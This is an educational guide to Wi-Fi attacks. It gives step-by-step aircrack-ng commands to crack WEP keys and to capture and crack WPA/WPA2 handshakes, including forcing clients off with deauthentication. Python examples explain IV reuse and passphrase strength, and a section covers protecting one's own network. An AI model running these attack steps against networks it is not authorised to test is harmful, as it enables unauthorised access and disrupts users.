Wi-Fi Hacking: WEP/WPA/WPA2 Attacks

TL;DR

This guide explains how Wi-Fi networks using older security (WEP) and common security (WPA/WPA2) can be attacked. It’s for educational purposes only – attempting to hack networks without permission is illegal. We’ll cover the basics of each attack type, tools used, and ways to protect your own network.

1. Understanding Wi-Fi Security

Before we start, let’s quickly look at the security types:

  • WEP (Wired Equivalent Privacy): Very old and easily cracked. Avoid using this if possible!
  • WPA (Wi-Fi Protected Access): Better than WEP but still vulnerable to attacks, especially dictionary attacks.
  • WPA2 (Wi-Fi Protected Access 2): More secure than WPA. The protocol itself holds up, but a pre-shared key protected by a weak passphrase can still be recovered offline from a captured handshake, given enough time and computing power.
  • WPA3: The latest standard, offering the best security currently available.

2. Attacking WEP Networks

WEP is outdated and insecure. These attacks are mostly for learning purposes as you’re unlikely to find a network still using it.

2.1 Tools

  • Aircrack-ng suite: The primary toolset for Wi-Fi auditing, including tools like Airodump-ng and Aireplay-ng.

2.2 Steps

  1. Put your wireless adapter into monitor mode: This allows it to capture all Wi-Fi traffic.
    sudo airmon-ng start wlan0
  2. Use Airodump-ng to find target networks: Identify the BSSID (MAC address) and channel of the WEP network you want to attack.
    sudo airodump-ng wlan0mon
  3. Capture IVs (Initialization Vectors): Lock Airodump-ng onto the target's channel and BSSID and write the frames to a capture file (without -w nothing is saved to disk). You need enough IVs for a successful crack (usually 20,000+).
    sudo airodump-ng -c CHANNEL --bssid BSSID -w capturefile wlan0mon

    (Replace CHANNEL with the network's channel and BSSID with its MAC address. Airodump-ng numbers its output files, so the capture will be named capturefile-01.cap.)

  4. Use Aireplay-ng to generate more traffic: This speeds up the process of capturing IVs.
    sudo aireplay-ng -3 -b BSSID -h MAC_ADDRESS wlan0mon

    (Replace BSSID with the target network’s MAC address and MAC_ADDRESS with your own wireless adapter’s MAC address.)

  5. Crack the WEP key using Aircrack-ng: The default statistical (PTW) attack recovers the key from the captured IVs alone, so no wordlist is involved here.
    sudo aircrack-ng -b BSSID capturefile.cap

    (Replace BSSID with the target network's MAC address and capturefile.cap with the name of the captured file.)
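The IV count the steps above ask for exists because the statistical attacks on RC4's key schedule need many distinct IVs. The following added example, which is not part of the original guide, illustrates the older and more fundamental flaw behind WEP's design: the per-frame RC4 key is IV || secret key with only a 24-bit IV, so IVs repeat after a few thousand frames, and two frames encrypted under the same IV share a keystream that cancels out when the ciphertexts are XORed. The RC4 and WEP helpers are textbook implementations written for this example (the WEP ICV is omitted), and the key, IV and frame contents are constructed values.

```python
# Added example (not from the original guide): why WEP's 24-bit IV is a fatal weakness.
# Per-frame key = IV (3 bytes) || secret key (5 or 13 bytes), then RC4 keystream XOR data.
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encrypt/decrypt (the operation is symmetric)."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style frame body: RC4 under the per-packet key IV || secret key (ICV omitted)."""
    if len(iv) != 3 or len(secret_key) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 40- or 104-bit secret key")
    return rc4(iv + secret_key, plaintext)


def keystream_reuse_leak(secret_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """True when C1 xor C2 == P1 xor P2, i.e. the shared keystream cancelled out and
    an observer learns the XOR of the two plaintexts without knowing the key."""
    c1 = wep_encrypt(secret_key, iv, p1)
    c2 = wep_encrypt(secret_key, iv, p2)
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


def iv_collision_probability(frames: int) -> float:
    """Birthday-bound probability that at least one IV repeats among `frames` frames
    when IVs are drawn uniformly from the 2^24 space."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))


def expected_frames_to_first_repeat() -> float:
    """Expected number of frames before the first IV repeat: sqrt(pi/2 * 2^24) ~ 5134."""
    return math.sqrt(math.pi / 2 * IV_SPACE)


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"             # constructed 40-bit demo key
    iv = b"\x00\x00\x01"                      # constructed IV reused by two frames
    p1, p2 = b"GET /index.html", b"POST /login.php"
    print("keystream reuse leaks P1 xor P2:", keystream_reuse_leak(key, iv, p1, p2))
    print("expected frames to first IV repeat: %.0f" % expected_frames_to_first_repeat())
    for n in (1_000, 5_000, 10_000, 20_000):
        print("P(IV repeat) after %6d frames: %.3f" % (n, iv_collision_probability(n)))
```

A busy access point sends thousands of frames per minute, so IV reuse is a certainty rather than a risk; this, together with RC4's weak key schedule, is why the guide's advice to avoid WEP entirely is the only real mitigation.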

3. Attacking WPA/WPA2 Networks

Attacking WPA/WPA2 networks is more complex than attacking WEP, but still possible.

3.1 Tools

  • Aircrack-ng suite: Still essential for capturing handshakes and cracking passwords.

3.2 Steps (Dictionary Attack)

  1. Put your wireless adapter into monitor mode: As with WEP attacks.
    sudo airmon-ng start wlan0
  2. Use Airodump-ng to find target networks: Identify the BSSID and channel of the WPA/WPA2 network you want to attack and a connected client.
    sudo airodump-ng wlan0mon
  3. Capture the handshake: This is the most important step. You need to capture the 4-way handshake when a device connects to the network. Lock Airodump-ng onto the target's channel and BSSID, writing to a file, and then (in a second terminal) deauthenticate a client to force it to reconnect.
    sudo airodump-ng -c CHANNEL --bssid BSSID -w handshakefile wlan0mon
    sudo aireplay-ng -0 1 -a BSSID -c MAC_ADDRESS wlan0mon

    (Replace CHANNEL with the network's channel, BSSID with the target network's MAC address and MAC_ADDRESS with a connected client's MAC address. Airodump-ng numbers its output files, so the capture will be named handshakefile-01.cap.)

  4. Crack the password using Aircrack-ng: Use a wordlist to try common passwords. Each candidate is checked against the captured handshake offline, so this step does not touch the network again.
    sudo aircrack-ng -w /path/to/wordlist.txt handshakefile.cap

    (Replace /path/to/wordlist.txt with the path to your wordlist and handshakefile.cap with the name of the captured handshake file.)

4. Protecting Your Wi-Fi Network

  • Use WPA3: If your devices support it, this is the best option for security.
  • Strong Password: Use a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols.
  • Hide Your SSID: While not foolproof, hiding your network name makes it slightly harder to find.
  • MAC Address Filtering: Only allow known devices to connect to your network.
  • Regularly Update Firmware: Keep your router’s firmware up-to-date to patch security vulnerabilities.
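The dictionary attack in section 3 and the "Strong Password" advice above are two sides of the same fact: once the 4-way handshake is captured, every passphrase guess can be verified offline, and the only cost per guess is the key derivation that WPA/WPA2-Personal specify (PBKDF2-HMAC-SHA1 with 4096 iterations, the SSID as salt, a 256-bit result). The following added example is not part of the original guide; it implements that derivation, counts the work per guess, and turns assumed guess rates into worst-case cracking times for passphrases of different shapes. The wordlist and the guess rates are constructed, illustrative values, not measurements of any real hardware.

```python
# Added example (not from the original guide): WPA/WPA2-Personal PMK derivation and
# what it implies for passphrase policy. PBKDF2 parameters are those of IEEE 802.11.
import hashlib
import math
from typing import Iterable, Optional

PBKDF2_ITERATIONS = 4096
PMK_BYTES = 32
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Constructed demo wordlist (stands in for the "/path/to/wordlist.txt" of the guide).
DEMO_WORDLIST = ["password", "letmein1", "ThisIsAPassword", "qwerty123", "iloveyou"]


def derive_pmk(passphrase: str, ssid: str) -> str:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), hex-encoded."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA/WPA2 passphrases are 8 to 63 ASCII characters")
    if not 1 <= len(ssid.encode()) <= 32:
        raise ValueError("SSIDs are 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_BYTES).hex()


def hmac_calls_per_guess() -> int:
    """SHA-1 yields 20 bytes per PBKDF2 block, so a 32-byte PMK needs two blocks of
    4096 HMAC-SHA1 calls each: the fixed cost an attacker pays for every guess."""
    blocks = math.ceil(PMK_BYTES / hashlib.sha1().digest_size)
    return blocks * PBKDF2_ITERATIONS


def guesses_to_find(pmk_hex: str, ssid: str, wordlist: Iterable[str]) -> Optional[int]:
    """How many derivations a wordlist run needs before a candidate matches, or None.
    A passphrase that appears in any wordlist falls regardless of its length."""
    for n, candidate in enumerate(wordlist, start=1):
        if 8 <= len(candidate) <= 63 and derive_pmk(candidate, ssid) == pmk_hex:
            return n
    return None


def keyspace(charset_size: int, length: int) -> int:
    """Number of passphrases of `length` characters drawn from `charset_size` symbols."""
    return charset_size ** length


def seconds_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase of the given shape at the assumed rate."""
    return keyspace(charset_size, length) / guesses_per_second


def years_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    return seconds_to_exhaust(charset_size, length, guesses_per_second) / SECONDS_PER_YEAR


if __name__ == "__main__":
    ssid = "ThisIsASSID"                       # constructed SSID
    print("HMAC-SHA1 calls per guess:", hmac_calls_per_guess())

    weak = derive_pmk("ThisIsAPassword", ssid)
    strong = derive_pmk("xq7!Vb2#pL9wRz4&", ssid)  # constructed random-looking passphrase
    print("wordlist hit on weak passphrase after guesses:", guesses_to_find(weak, ssid, DEMO_WORDLIST))
    print("wordlist hit on strong passphrase:", guesses_to_find(strong, ssid, DEMO_WORDLIST))

    assumed_rate = 1_000_000.0                 # illustrative guesses/second, not a measurement
    for label, charset, length in (("8 lowercase letters", 26, 8),
                                   ("12 mixed-case letters and digits", 62, 12),
                                   ("16 printable ASCII characters", 95, 16)):
        print("%-36s %.3g years to exhaust at %.0e guesses/s"
              % (label, years_to_exhaust(charset, length, assumed_rate), assumed_rate))
```

The numbers show why the guide's advice is ordered as it is: a short or dictionary passphrase falls to the offline attack no matter how the router is otherwise configured, while a long random one pushes exhaustive search beyond any realistic budget, and WPA3's SAE handshake removes the offline verification step altogether.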